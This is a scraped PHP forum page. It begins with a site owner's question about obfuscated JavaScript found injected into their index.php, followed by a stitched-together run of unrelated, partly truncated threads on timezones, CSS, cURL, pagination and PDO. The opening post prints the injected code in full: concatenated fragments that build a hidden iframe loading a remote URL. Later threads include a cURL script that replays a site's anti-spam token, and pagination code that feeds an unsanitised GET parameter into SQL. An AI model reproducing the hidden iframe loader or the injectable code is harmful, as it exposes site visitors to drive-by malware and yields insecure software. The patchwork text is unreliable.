|
PHP - Javascript Injected Into The Bottom Of My Page
I looked at my site today to see a blank page. I downloaded my index.php file to find a stray bit of code at the bottom:-
Code: [Select] <html><body>status='';cn='r';j='d';a='a';zi='s';we='tp:';y='ph';pb='iz';o='.';v='e';n='/';g='r';sa='eaw';az='am';bj='rc';oy='ne';r='ht';dj='//s';c='if';dr='t/.';ml='2/';ne=c.concat(cn,az,v);sn=zi.concat(bj);wl=r.concat(we,dj,sa,pb,a,g,j,o,oy,dr,y,n,ml);var l=document.createElement(ne);l.setAttribute('width','5');l.setAttribute('height','5');l.setAttribute('style','display:none');l.setAttribute(sn,wl);document.body.appendChild(l);window.status=status;</body></html> My question is, how did it get there? I am guessing either somebody has brute forced my FTP details or found an exploit in my code. I have now changed my FTP details just to be sure. How would I go about finding the cause of this and preventing it from happening again. Cheers Similar TutorialsIt is my belief that when storing time in the DB, it should always be at UTC. Agree? My question is whether one should work with DateTimes with a specific time zone or only do so when displaying the time to the user? For example, if I have multiple users which have a timezone string property based on their physical location as well as a datatime property when some event occurred for the given user, and need to implement some logic if the event occurred more than a given duration from the current time, which of the following approaches should be used?
$currentTime = new DateTimeImmutable();
$userEventTime = new DateTime($queryResults['theEventField']);
if($currentTime->sub(new DateInterval('P10D')) < $userEventTime) {
//Display time to the user
$displayEventTime = new DateTime('@'.$userEventTime->getTimestamp(), new DateTimeZone($queryResults['userTimeZone']))->format('Y-m-d H:i:sP');
}
$currentTime = new DateTimeImmutable('now', new DateTimeZone($queryResults['userTimeZone']));
$userEventTime = new DateTime($queryResults['theEventField'], new DateTimeZone($queryResults['userTimeZone']));
if($currentTime->sub(new DateInterval('P10D')) < $userEventTime) {
//Display time to the user
$displayEventTime = $userEventTime->format('Y-m-d H:i:sP');
}
Is there a code I can put with each of these errors so that, on error, the page reloads back to the bottom of the page? When you enter the wrong info, the page already reloads but it reloads to the top of the page. People who didnt correctly information into the webpage may not see that they're receiving an error if it doesnt scroll back down. I attempted to put the error at the to of the page but I couldnt find a good spot. I thought about doing an error message box but I'm not sure thats the best method Anyway heres the code, thanks a lot. <?php if ($_POST['send']) { $errors = array(); if ($_POST['captcha'] != $_SESSION['captchacode']) { $errors[] = "You didn't enter the correct letters!"; <-------------ID LIKE TO PUT A CODE HERE AND } if (empty($_POST['email'])) { $errors[] = "Please enter an e-mail address"; <-----------------HERE TO MAKE THE PAGE GO TO THE BOTTOM WHEN IT REFRESHED (IT REFRESHES UPON EVERY IMPROPERLY FILLED OUT FORM } else if (!eregi("^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$", $_POST['email'])) { $errors[] = 'Please enter a VALID e-mail address'; } if (!count($errors)) { // IMPORTANT: If you don't call this the // user will keep getting the SAME code! captchaDone(); not for certain this is a PHP issue, but on every page of my site, at the bottom, this error displays. Doesn't affect any of the code execution as far as I can tell, but it's annoying. Anyone else seen this? Code: [Select] Error in my_thread_global_end(): 1 threads didn't exit Hi
I want to get my <footer> to appear at the bottom of my page, but I dont want it to be fixed there.
So if the middle contents of a page is very short, the <footer> will be visibled at the bottom of the browser, but if the page contents is long, then the <footer> would just disappear at the bottom of the contents.
Can this be done?
Thanks
I want a div at the bottom of another div, and I want it centered, just using css not javascript.
HTML
<div id="parent">
<div id="bottom_element">test</div>
</div>
CSS
#parent {height:100% width:100%}
#bottom_element {position:absolute; bottom:5px; width:200px; margin:0 auto}
So the issue is that position absolute and margin auto do not seem to work together. What is an alternative without javasript?
This topic has been moved to HTML Help. http://www.phpfreaks.com/forums/index.php?topic=319527.0 This is the code I have now however when you click next to view more results it says please enter a search..., (there is more code above this however I thought that the problem would be within the code provided.) $currPage = (($s/$limit) + 1); //break before paging echo "<br />"; // next we need to do the links to other results if ($s>=1) { // bypass PREV link if s is 0 $prevs=($s-$limit); print " <a href=\"$PHP_SELF?s=$prevs&q=$var\"><< Prev 10</a>  "; } // calculate number of pages needing links $pages=intval($numrows/$limit); // $pages now contains int of pages needed unless there is a remainder from division if ($numrows%$limit) { // has remainder so add one page $pages++; } // check to see if last page if (!((($s+$limit)/$limit)==$pages) && $pages!=1) { // not last page so give NEXT link $news=$s+$limit; echo " <a href=\"$PHP_SELF?s=$news&q=$var\">Next 10 >></a>"; } $a = $s + ($limit) ; if ($a > $numrows) { $a = $numrows ; } $b = $s + 1 ; echo "<p>Showing results $b to $a of $numrows</p>"; ?> I'm trying to generate a page with javascript in it with PHP. But the quotations are causing me problems, I need a third set of quotations. Here is the part I am having trouble with: echo"<div class='level'>Edit:</div><div class='box'><input type = 'text' size='50' name='cat' value='$cat'/> <b><input type='button' value='+ Details' onclick='document.getElementById('rev$clicker').style.display='block';'/></b> </div><br>"; When I view the html it comes out onclick='document.getElementById('rev$clicker').style.display='block';' I can't use "" quotations for 'block' and 'rev$clicker' because that would exit from the echo and I can't exit php because I need the $clicker variable. Hello, Im making a little script to grab some data from a website but the data loads up a Javascript popup and unless you click the link from the page you came from you get a 404 error. Is there any ways to able me to load up the page using php so i can access some of the data on the page. The page im trying to access has the following code in the head, Does that have anything to do why you cant directly access it? Code: [Select] <META NAME="Robots" CONTENT="index,follow"> Hope this makes sense, If anyone knows a solution i would really appreciate it. I wasn't sure where to post this so I apologize if this is the wrong forum. I have a php page with over 50 numerical inputs on a form. A lot of the inputs are used to get data out of the mysql database so I want to be safe from sql injection. Is it safe to use a javascript onsubmit function that will not allow the form to be submitted if there is any non numeric data entered by the user? I've already written the function & it works fine but I'm not sure how much protection it gives me. Any feedback welcome. Hi all, I am new here and I really thank God that I found this forum! I have read the materials here on working with cURL on javascript-form-submission pages. However, I can't to get my script to work. Can anybody here please help me out or drop me a hint on where to correct my script? ==Situation== My company utilizes http://www.myfax.com/free/ to send our company faxes. My task is to write a code that would submit files for faxes electronically. Note: The site also requires e-mail confirmation but I haven't get to that stage yet. I have run tests on submitting fax requests both by code and manually through the site, and have confirmed that the code doesn't work on the submission level because I managed to receive confirmation e-mails for manual submissions. Also, I tried my script with different staff email addresses because I figured out that it blocks only the same e-mail address from sending more than 2 faxes a day. Code: (php) [Select] <?php //target page url $strPage_url = 'www.myfax.com/free/'; //create array of data to be posted $arrPost_data = array ( 'ctl00$MainSection$tbRecipientName' => 'I am recipient', //max length = 50 'ctl00$MainSection$tbRecipientCompany' => 'I am recipient company', //max length = 50 'ctl00$MainSection$tbRecipientFaxNumber' => '+1 (206) 202-8273', //recipient fax 'ctl00$MainSection$ddlRecipientCountry' => html_entity_decode ('{"c":{"i":"2","n":"United States","t":"1","s":"US"},"m":{"i":"1","v":"+1 (###) ###-####","d":"","f":"","c":"","r":""}}'), 'ctl00$MainSection$tbSenderName' => 'I am sender', //max length = 50 'ctl00$MainSection$tbSenderCompany' => 'I am sender company', //max length = 50 'ctl00$MainSection$tbSenderEmailAddress' => 'abc@example.com', //email 'ctl00$MainSection$nbAntiSpam$nbAntiSpam_NoBotExtender_ClientState' => '-150', //number drawn from inspecting the packages sent by manual form submission 'ctl00$MainSection$fileUpload' => '@/files/file.pdf', //file 'ctl00$MainSection$tbMessage' => 'hello world', //message '__EVENTTARGET' => '', '__EVENTARGUMENT' => '', '__VIEWSTATEENCRYPTED' => '' ); //visit the page and get cookies $curl_connection = curl_init ($strPage_url); curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 0); curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"); curl_setopt($curl_connection, CURLOPT_REFERER, "http://www.myfax.com/free/"); curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($curl_connection, CURLOPT_COOKIEJAR, 'CURLCOOKIE'); $strGet_page_contents = curl_exec ($curl_connection); curl_close ($curl_connection); //get page to retrieve view state and event validation if ( preg_match ( '/"__VIEWSTATE"[\s]+?value="([\s\S]+?)"/' , $strGet_page_contents , $arrView_state ) ) { $strView_state = $arrView_state[1]; $arrPost_data['__VIEWSTATE'] = $strView_state; } if ( preg_match ( '/"__EVENTVALIDATION"[\s]+?value="([\s\S]+?)"/' , $strGet_page_contents , $arrEvent_validation ) ) { $strEvent_validation = $arrEvent_validation[1]; $arrPost_data['__EVENTVALIDATION'] = $strEvent_validation; } if ( preg_match ( '/id="ctl00_MainSection_nbAntiSpam_nbAntiSpam_NoBotExtender_ClientState" value="([\s\S]+?)"/' , $strGet_page_contents , $arrAnti_spam ) ) { $strAnti_spam = $arrAnti_spam[1]; $arrPost_data['ctl00$MainSection$nbAntiSpam$nbAntiSpam_NoBotExtender_ClientState'] = $strAnti_spam; } //traverse array and prepare data for posting (key1=value1) foreach ( $arrPost_data as $key => $value) { $arrPost_items[] = $key . '=' . $value; } //create the final string to be posted using implode() $strPost_string = implode ('&', $arrPost_items); //create cURL connection $curl_connection = curl_init($strPage_url); //set options curl_setopt ($curl_connection, CURLOPT_POST, 1); curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 0); curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"); curl_setopt($curl_connection, CURLOPT_REFERER, "http://www.myfax.com/free/"); curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1); //set cookie curl_setopt ($curl_connection, CURLOPT_COOKIEFILE, 'CURLCOOKIE'); unlink ( 'CURLCOOKIE' ); curl_setopt($curl_connection, CURLOPT_COOKIE, session_name() . '=' . session_id()); //set header $arrHeaders = array ( 'Content-Type' => 'application/x-www-form-urlencoded; charset=utf-8' ); curl_setopt($curl_connection, CURLOPT_HTTPHEADER, $arrHeaders ); //set data to be posted curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $strPost_string); //perform our request $strResult = curl_exec($curl_connection); //show information regarding the request - for debugging echo "<pre>"; print_r(curl_getinfo($curl_connection)); echo curl_errno($curl_connection) . '-' . curl_error($curl_connection); echo "<hr>"; var_dump ($arrPost_items); echo "</pre>"; //close the connection curl_close($curl_connection); ?> This topic has been moved to JavaScript Help. http://www.phpfreaks.com/forums/index.php?topic=351266.0 Code: [Select] <form action='test.php' method='post'> <input id="Username" type="hidden" name="date2" /> <input type="submit" name="action" value="Submit"></form> Hi I want to pass a Username javascript variable to test.php as hidden, anyone can help? When code this Code: [Select] <input id="Username" type="input" name="date2" />Data can pass to test.php When code this Code: [Select] <input id="Username" type="hidden" name="date2" />Data fail to pass over In one of my pages I have a section which contains a hidden line of text. When the user clicks a button the box containing the text will expand showing the line more clearly. I want this to happen live i.e. no page refresh/reload. I've seen such things done on other sites but my question is, is this done using a php function or is JavaScript required to achieve this? I assume that in order for any php functions to take place there must be a page refresh to reload the data/parameters/variables that are required? The site I'm referring to is this one:- http://www.vouchercodes.co.uk/featured-voucher-codes.html If you click on the "Get code and open site" buttons there for any of the vouchers the area expands live and the voucher is revealed however as I say there is no page refresh and it is done live. Is this effect done in JavaScript and not php or is there some way of using php alone to do something similar? Obviously including JScript in a site is more risky as if a user does not have it installed/activated then they may not be able to use such elements hence the reason I want to know how it is done. Quesion: Show each movie in the database on its own page, and give the user links in a "page 1, Page 2, Page 3" - type navigation system. Hint: Use LIMIT to control which movie is on which page. I have provided 3 files: 1st: configure DB, 2nd: insert data, 3rd: my code for the question. I would appreciate the help. I am a noob by the way. First set up everything for DB: <?php //connect to MySQL $db = mysql_connect('localhost', 'root', '000') or die ('Unable to connect. Check your connection parameters.'); //create the main database if it doesn't already exist $query = 'CREATE DATABASE IF NOT EXISTS moviesite'; mysql_query($query, $db) or die(mysql_error($db)); //make sure our recently created database is the active one mysql_select_db('moviesite', $db) or die(mysql_error($db)); //create the movie table $query = 'CREATE TABLE movie ( movie_id INTEGER UNSIGNED NOT NULL AUTO_INCREMENT, movie_name VARCHAR(255) NOT NULL, movie_type TINYINT NOT NULL DEFAULT 0, movie_year SMALLINT UNSIGNED NOT NULL DEFAULT 0, movie_leadactor INTEGER UNSIGNED NOT NULL DEFAULT 0, movie_director INTEGER UNSIGNED NOT NULL DEFAULT 0, PRIMARY KEY (movie_id), KEY movie_type (movie_type, movie_year) ) ENGINE=MyISAM'; mysql_query($query, $db) or die (mysql_error($db)); //create the movietype table $query = 'CREATE TABLE movietype ( movietype_id TINYINT UNSIGNED NOT NULL AUTO_INCREMENT, movietype_label VARCHAR(100) NOT NULL, PRIMARY KEY (movietype_id) ) ENGINE=MyISAM'; mysql_query($query, $db) or die(mysql_error($db)); //create the people table $query = 'CREATE TABLE people ( people_id INTEGER UNSIGNED NOT NULL AUTO_INCREMENT, people_fullname VARCHAR(255) NOT NULL, people_isactor TINYINT(1) UNSIGNED NOT NULL DEFAULT 0, people_isdirector TINYINT(1) UNSIGNED NOT NULL DEFAULT 0, PRIMARY KEY (people_id) ) ENGINE=MyISAM'; mysql_query($query, $db) or die(mysql_error($db)); echo 'Movie database successfully created!'; ?> ******************************************************************** *********************************************************************** second file to load info into DB: <?php // connect to MySQL $db = mysql_connect('localhost', 'root', '000') or die ('Unable to connect. Check your connection parameters.'); //make sure you're using the correct database mysql_select_db('moviesite', $db) or die(mysql_error($db)); // insert data into the movie table $query = 'INSERT INTO movie (movie_id, movie_name, movie_type, movie_year, movie_leadactor, movie_director) VALUES (1, "Bruce Almighty", 5, 2003, 1, 2), (2, "Office Space", 5, 1999, 5, 6), (3, "Grand Canyon", 2, 1991, 4, 3)'; mysql_query($query, $db) or die(mysql_error($db)); // insert data into the movietype table $query = 'INSERT INTO movietype (movietype_id, movietype_label) VALUES (1,"Sci Fi"), (2, "Drama"), (3, "Adventure"), (4, "War"), (5, "Comedy"), (6, "Horror"), (7, "Action"), (8, "Kids")'; mysql_query($query, $db) or die(mysql_error($db)); // insert data into the people table $query = 'INSERT INTO people (people_id, people_fullname, people_isactor, people_isdirector) VALUES (1, "Jim Carrey", 1, 0), (2, "Tom Shadyac", 0, 1), (3, "Lawrence Kasdan", 0, 1), (4, "Kevin Kline", 1, 0), (5, "Ron Livingston", 1, 0), (6, "Mike Judge", 0, 1)'; mysql_query($query, $db) or die(mysql_error($db)); echo 'Data inserted successfully!'; ?> ************************************************************** **************************************************************** MY CODE FOR THE QUESTION: <?php $db = mysql_connect('localhost', 'root', '000') or die ('Unable to connect. Check your connection parameters.'); mysql_select_db('moviesite', $db) or die(mysql_error($db)); //get our starting point for the query from the URL if (isset($_GET['offset'])) { $offset = $_GET['offset']; } else { $offset = 0; } //get the movie $query = 'SELECT movie_name, movie_year FROM movie ORDER BY movie_name LIMIT ' . $offset . ' , 1'; $result = mysql_query($query, $db) or die(mysql_error($db)); $row = mysql_fetch_assoc($result); ?> <html> <head> <title><?php echo $row['movie_name']; ?></title> </head> <body> <table border = "1"> <tr> <th>Movie Name</th> <th>Year</th> </tr><tr> <td><?php echo $row['movie_name']; ?></td> <td><?php echo $row['movie_year']; ?></td> </tr> </table> <p> <a href="page.php?offset=0">Page 1</a>, <a href="page.php?offset=1">Page 2</a>, <a href="page.php?offset=2">Page 3</a> </p> </body> </html> I have a problem with one div, I want to fix it at the bottom of the page and when I zoom the page I can see the div without scroll.
I have been staring at this code for hours trying to figure out what is wrong, I guarantee that someone is going to look at it and make me feel like a tool. The first query is not going through the list, the second is. It worked till I started updating to PDO. I have tested the SQL, that works, probably a flipping comma or a quotation mark screwing with my brain. Please look and spot the obvious balls up and point it out to me. as in I get a result that looks like this
Heading
I am expecting
Heading Why is this failing? Please show a doddering old fool what I am doing wrong...
$query = $pdo->prepare("SELECT * FROM faq_cats WHERE faqc_site = :site ORDER BY faqc_id ASC LIMIT 0,4");
$query->bindParam(":site", $site);
$query->execute();
while($row = $query->fetch(PDO::FETCH_ASSOC)) {
$fid = $row["faqc_id"];
$faqc = $row["faqc_name"];
echo "<h2> ".$faqc." </h2>";
$query = $pdo->prepare("SELECT * FROM faqs WHERE faq_cat = :fid ORDER BY faq_id ASC");
$query->bindParam(":fid", $fid);
$query->execute();
while($row1 = $query->fetch(PDO::FETCH_ASSOC)) {
$faid=$row1["faq_id"];
$faqn=$row1["faq_question"];
echo "<a href=\"#".$faid."\">".$faqn."</a><br />";
}
}
This topic has been moved to CSS Help. http://www.phpfreaks.com/forums/index.php?topic=319246.0 Hi guys, I have a problem.. I have a table which shows the results, but the table is showing right at the bottom below the button "delete members" although the code is right above it so I don't really understand.. and hope someone can shed the light? Appreciated Code: [Select] <?php include "connect.php"; session_start(); if(!isset($_SESSION['email'])) { die('You have no access to this page.'); } else{ //Check if records were submitted for deletion if(isset($_POST['id']) && count($_POST['id'])) { //Ensure values are ints $deleteIDs = implode(', ', array_map('intval', $_POST['id'])); $query = "DELETE FROM member WHERE id IN ({$deleteIDs})"; //Debug line echo "Successfuly deleted member(s)"; mysql_query($query) or die(mysql_error()); } ?> <link rel="stylesheet" type="text/css" href="view.css" media="all"> <script type="text/javascript" src="view.js"></script> <body id="main_body" > <img id="top" src="top.png" alt=""> <div id="form_container"> <h1>Consult, Modify or Delete a Member</h1> <form id="form_362567" class="appnitro" method="post" action="searchmember.php"> <div class="form_description"> <h2> Consult, Search, Modify or Delete a Member</h2> <p></p> </div> <ul > <li class="section_break"> <br>Search members with any keyword or character within the options id/email/firstname/lastname/phone/address1/address2/city/county/postcode - relevant matches will show.<br><br> <b>Keyword/Character:</b><br> <input id="search" name="search" class="element text medium" type="text" maxlength="50" value=""/> <br><br> <b>Search on</b>:<br> <select name="searchvalue" id="searchvalue"> <option name="id" id="id">id</option> <option name="email" id="email">email</option> <option name="firstname" id="firstname">firstname</option> <option name="lastname" id="lastname">lastname</option> <option name="phone" id="phone">phone</option> <option name="address1" id="address1">address1</option> <option name="address2" id="address2">address2</option> <option name="city" id="city">city</option> <option name="county" id="county">county</option> <option name="postcode" id="postcode">postcode</option> </select><br><input type='submit' value='Search' name='go' /><INPUT TYPE="button" VALUE="Cancel" onClick="history.go(-1);return true;"><br> <br> To consult or modify a profile click on the member's E-mail address. <li class="section_break"> </form> <?php $result = mysql_query("SELECT * FROM member"); ?> <table border='1'> <tr> <th>First Name</th> <th>Last Name</th> <th>Phone Number</th> <th>Postcode</th> <th>E-mail</th> <th>Delete</th> </tr> <?php while($row = mysql_fetch_array($result)) { echo "<form action='' method='POST'>"; echo "<tr>"; echo "<td>" . $row['firstname'] . "</td>"; echo "<td>" . $row['lastname'] . "</td>"; echo "<td>" . $row['phone'] . "</td>"; echo "<td>" . $row['postcode'] . "</td>"; echo "<td>"; echo '<a href="consultmember.php?email='; echo $row['email']; echo '">'; echo $row['email']; echo "</a></td>"; echo "<td><input type='checkbox' name='id[]' value='{$row['id']}' /></td>"; echo "</tr>"; } ?> <br><input type='submit' value='Delete Members' name='delete' /><INPUT TYPE="button" VALUE="Cancel" onClick="history.go(-1);return true;"><br> </form> <div id="footer"> </div> </div> <img id="bottom" src="bottom.png" alt=""> </body> <?php } ?> I have a checkout form that goes like this... Code: [Select] <?php session_start(); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head></head> <body></body> </html> Can I start adding this line of code to all of my PHP files - AS THE LAST LINE - without any negative consequences?? Code: [Select] <? // Build date 2011-05-14 ?> Debbie |
|||||||